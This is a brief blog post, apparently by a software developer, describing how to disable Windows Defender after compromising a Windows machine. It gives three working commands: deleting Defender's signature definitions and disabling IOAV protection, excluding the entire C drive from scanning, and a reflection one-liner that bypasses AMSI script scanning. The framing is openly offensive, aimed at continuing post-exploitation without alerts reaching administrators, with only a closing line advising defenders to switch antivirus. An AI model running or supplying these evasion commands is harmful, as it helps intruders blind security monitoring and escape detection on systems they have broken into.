Skip to content

Bypassing Windows Defender On Post-Exploitation

So you were able to exploit a Windows box but now you have to deal with Windows Defender on that system. Before you can load your tools for further post exploitation, Defender must be dealt with. Here is 3 simple commands that will disable it, mitigate the possibility of it starting back up and bypass the Window’s Antimalware Scan Interface from discovering malicious script payloads.

  1. Disable Windows Defender and delete current signature list
"c:\Program Files\Windows Defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true

2. Exclude the C drive in case Windows Defender starts back up.

Add-MpPreference -ExclusionPath "C:\"

3. Bypass Window’s AMSI to thwart malicious script detection

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic, Static').SetValue($null, $true)

Now you should have free reign to continue your post exploitation without the possibility of Defender sending alerts back to system administrators via virus/malware detection. As it is this easy to thwart Defender once admin credentials have been obtained, it is a very good idea to seek a different AV to defend your network.

Michael has been a professional in the information technology field for over 10 years, specializing in software engineering and systems administration. He studied network security and holds a software engineering degree from Milwaukee Area Technical College with thousands of hours of self taught learning as well. He mainly writes about technology, current events, and coding. Michael also is the founder of Sof Digital, an U.S. based software development Firm. His hobbies are archery, turntablism, disc golf and rally racing.

Comments are closed.